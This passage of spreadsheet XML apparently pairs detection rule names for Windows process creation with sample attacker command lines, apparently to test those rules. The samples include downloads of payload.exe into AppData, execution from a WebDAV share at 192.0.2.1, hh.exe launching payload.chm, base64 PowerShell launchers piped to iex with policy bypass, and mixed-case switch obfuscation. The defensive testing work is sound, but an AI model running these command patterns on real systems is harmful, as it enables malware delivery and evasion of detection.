          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C291" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D291" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E291" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F291" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G291" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H291" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I291" s="44" t="n"/>
      <c r="J291" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K291" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="292" ht="15.75" customHeight="1" s="42">
      <c r="A292" s="43" t="n"/>
      <c r="B292" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C292" s="44" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D292" s="44" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E292" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C " net use https://192.0.2.1/share &amp; start \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F292" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G292" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H292" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I292" s="44" t="n"/>
      <c r="J292" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K292" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="293" ht="15.75" customHeight="1" s="42">
      <c r="A293" s="43" t="n"/>
      <c r="B293" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C293" s="44" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D293" s="44" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E293" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "net use http://192.0.2.1/share; Start-Process \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F293" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G293" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H293" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I293" s="43" t="n"/>
      <c r="J293" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K293" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="15.75" customHeight="1" s="42">
      <c r="A294" s="43" t="n"/>
      <c r="B294" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C294" s="44" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D294" s="44" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E294" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "net use http://192.0.2.1/share; Start-Process \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F294" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G294" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H294" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I294" s="43" t="n"/>
      <c r="J294" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K294" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="295" ht="15.75" customHeight="1" s="42">
      <c r="A295" s="43" t="n"/>
      <c r="B295" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C295" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D295" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E295" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F295" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G295" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H295" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I295" s="44" t="n"/>
      <c r="J295" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K295" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1" s="42">
      <c r="A296" s="43" t="n"/>
      <c r="B296" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C296" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D296" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E296" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F296" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G296" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H296" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I296" s="43" t="n"/>
      <c r="J296" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K296" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="297" ht="15.75" customHeight="1" s="42">
      <c r="A297" s="43" t="n"/>
      <c r="B297" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C297" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D297" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E297" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F297" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G297" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H297" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I297" s="43" t="n"/>
      <c r="J297" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K297" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1" s="42">
      <c r="A298" s="43" t="n"/>
      <c r="B298" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C298" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D298" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E298" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I298" s="43" t="n"/>
      <c r="J298" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K298" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="299" ht="15.75" customHeight="1" s="42">
      <c r="A299" s="43" t="n"/>
      <c r="B299" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C299" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D299" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E299" s="44" t="inlineStr">
        <is>
          <t>$o = New-Object IO.MemoryStream; $data = [System.Convert]::FromBase64String('...'); iex ([System.Text.Encoding]::ASCII.GetString($data))</t>
        </is>
      </c>
      <c r="F299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299" s="43" t="n"/>
      <c r="J299" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K299" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="15.75" customHeight="1" s="42">
      <c r="A300" s="43" t="n"/>
      <c r="B300" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C300" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D300" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E300" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F300" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G300" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H300" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I300" s="43" t="n"/>
      <c r="J300" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K300" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="301" ht="15.75" customHeight="1" s="42">
      <c r="A301" s="43" t="n"/>
      <c r="B301" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C301" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D301" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E301" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F301" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G301" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H301" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I301" s="44" t="n"/>
      <c r="J301" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K301" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="302" ht="15.75" customHeight="1" s="42">
      <c r="A302" s="43" t="n"/>
      <c r="B302" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C302" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D302" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E302" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -NoProfile -W H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F302" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G302" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H302" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I302" s="43" t="n"/>
      <c r="J302" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K302" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="303" ht="15.75" customHeight="1" s="42">
      <c r="A303" s="43" t="n"/>
      <c r="B303" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C303" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D303" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E303" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -nop /"W" H -st $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F303" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G303" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H303" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I303" s="43" t="n"/>
      <c r="J303" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K303" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="15.75" customHeight="1" s="42">
      <c r="A304" s="43" t="n"/>
      <c r="B304" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C304" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D304" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E304" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -nopROFiLe /"W" H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F304" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G304" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H304" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I304" s="44" t="n"/>
      <c r="J304" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K304" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="305" ht="15.75" customHeight="1" s="42">
      <c r="A305" s="43" t="n"/>
      <c r="B305" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C305" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D305" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E305" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXecutiONpolIcY Bypass /"NoProfile" -W H /"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F305" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G305" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H305" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I305" s="44" t="n"/>
      <c r="J305" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K305" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="306" ht="15.75" customHeight="1" s="42">
      <c r="A306" s="43" t="n"/>
      <c r="B306" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C306" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D306" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E306" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -NOprofilE /"W" H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F306" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G306" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H306" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I306" s="43" t="n"/>
      <c r="J306" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K306" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="307" ht="15.75" customHeight="1" s="42">
      <c r="A307" s="43" t="n"/>
      <c r="B307" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C307" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D307" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E307" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTioNPOLICy Bypass -nop -"W" H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F307" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G307" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H307" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I307" s="43" t="n"/>
      <c r="J307" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K307" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="308" ht="15.75" customHeight="1" s="42">
      <c r="A308" s="43" t="n"/>
      <c r="B308" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C308" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D308" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E308" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTiOnpOliCy Bypass /"NoProfile" -"W" H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F308" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G308" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H308" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I308" s="43" t="n"/>
      <c r="J308" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K308" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="309" ht="15.75" customHeight="1" s="42">
      <c r="A309" s="43" t="n"/>
      <c r="B309" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C309" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D309" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E309" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -W H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F309" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G309" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H309" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I309" s="43" t="n"/>
      <c r="J309" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K309" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="310" ht="15.75" customHeight="1" s="42">
      <c r="A310" s="43" t="n"/>
      <c r="B310" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C310" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D310" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E310" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"nop" -noni -w 1 /"exec" bypass /"c" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F310" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G310" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H310" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I310" s="43" t="n"/>
      <c r="J310" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K310" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="311" ht="15.75" customHeight="1" s="42">
      <c r="A311" s="43" t="n"/>
      <c r="B311" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C311" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D311" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E311" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -nONI -w 1 -"exec" bypass -C "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F311" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G311" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H311" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I311" s="43" t="n"/>
      <c r="J311" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K311" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="312" ht="15.75" customHeight="1" s="42">
      <c r="A312" s="43" t="n"/>
      <c r="B312" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C312" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D312" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E312" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -noNI /"w" 1 /"exec" bypass /"c" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F312" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G312" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H312" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I312" s="43" t="n"/>
      <c r="J312" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K312" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="313" ht="15.75" customHeight="1" s="42">
      <c r="A313" s="43" t="n"/>
      <c r="B313" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C313" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D313" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E313" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"nop" -noni -w 1 -exEC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F313" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G313" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H313" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I313" s="43" t="n"/>
      <c r="J313" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K313" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="314" ht="15.75" customHeight="1" s="42">
      <c r="A314" s="43" t="n"/>
      <c r="B314" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C314" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D314" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E314" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" -noni -w 1 -eXeC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F314" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G314" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H314" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I314" s="43" t="n"/>
      <c r="J314" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K314" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="315" ht="15.75" customHeight="1" s="42">
      <c r="A315" s="43" t="n"/>
      <c r="B315" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C315" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D315" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E315" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -NonInteractive -WinDOwsTYle Hidden -ep Bypass /"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F315" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G315" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H315" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I315" s="43" t="n"/>
      <c r="J315" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K315" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="316" ht="15.75" customHeight="1" s="42">
      <c r="A316" s="43" t="n"/>
      <c r="B316" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C316" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D316" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E316" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"NonInteractive" -"WindowStyle" Hidden /"ExecutionPolicy" Bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F316" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G316" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H316" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I316" s="44" t="n"/>
      <c r="J316" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K316" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="317" ht="15.75" customHeight="1" s="42">
      <c r="A317" s="43" t="n"/>
      <c r="B317" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C317" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D317" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E317" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"NonInteractive" -"WindowStyle" Hidden -"ExecutionPolicy" Bypass -"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F317" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G317" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H317" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I317" s="44" t="n"/>
      <c r="J317" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K317" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="318" ht="15.75" customHeight="1" s="42">
      <c r="A318" s="43" t="n"/>
      <c r="B318" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C318" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D318" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E318" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -nOniNteRacTivE -"WindowStyle" Hidden -EXECuTIONpOlIcy Bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F318" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G318" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H318" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I318" s="43" t="n"/>
      <c r="J318" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K318" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="319" ht="15.75" customHeight="1" s="42">
      <c r="A319" s="43" t="n"/>
      <c r="B319" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C319" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D319" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E319" s="44" t="inlineStr">
        <is>
